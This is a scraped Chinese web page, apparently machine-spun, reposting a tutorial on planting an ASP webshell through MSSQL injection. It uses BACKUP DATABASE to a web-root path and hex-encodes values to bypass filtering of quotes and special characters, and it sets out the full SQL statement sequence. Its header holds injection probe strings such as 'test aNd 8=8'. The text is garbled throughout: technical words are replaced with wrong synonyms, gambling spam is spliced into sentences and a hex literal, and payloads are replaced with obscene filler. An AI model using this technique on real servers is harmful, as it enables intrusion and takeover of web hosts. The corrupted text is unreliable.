?
快捷搜索:  as  test  1111  test aNd 8=8  test++aNd+8=8  as++aNd+8=8  as aNd 8=8

和記娛棒h88285:Mssql Backup a Shell 突破特殊字符

?

1.插入數據

mssql打針應用Backup或makewebtask獲得webshell,在寫入webshell代碼和記娛棒h88285時,假如過濾了一些特殊字符,如" '等。我們先mssql闡發器里“查詢”:

use pubs; ')

select * from cmd; 2.導前道路

老例的插入數據后導出webshell的語句為:

backup database model to disk='g:\wwwtest\l.asp';

顯然導前道路里體貼了' : \等,我們照舊可以應用hex編碼來沖破:

declare @a sysname

select @a=0x673A5C7777777465和記娛棒h8828573745C6C2E617370 3.小結:

結合1,2我們可以獲得完備的導出webshell的sql語句款式為:

use model

create table cmd (str image)

insert into cmd(str) 和記娛棒h88285values(0x奸淫奸淫奸淫**)

declare @a sysname select @a=0x奸淫奸淫奸淫*和記娛棒h88285 backup database pubs to [email protected];

著實應用hex等編碼的措施,在angel的文章〈饒過'(單引號)限定和記娛棒h88285繼承射入〉里提過,我只是照搬而已,你也可以搬到其他地方去拉:).

免責聲明:以上內容源自網絡,版權歸原作者所有,如有侵犯您的原創版權請告知,我們將盡快刪除相關內容。

您可能還會對下面的文章感興趣:

快三平台开户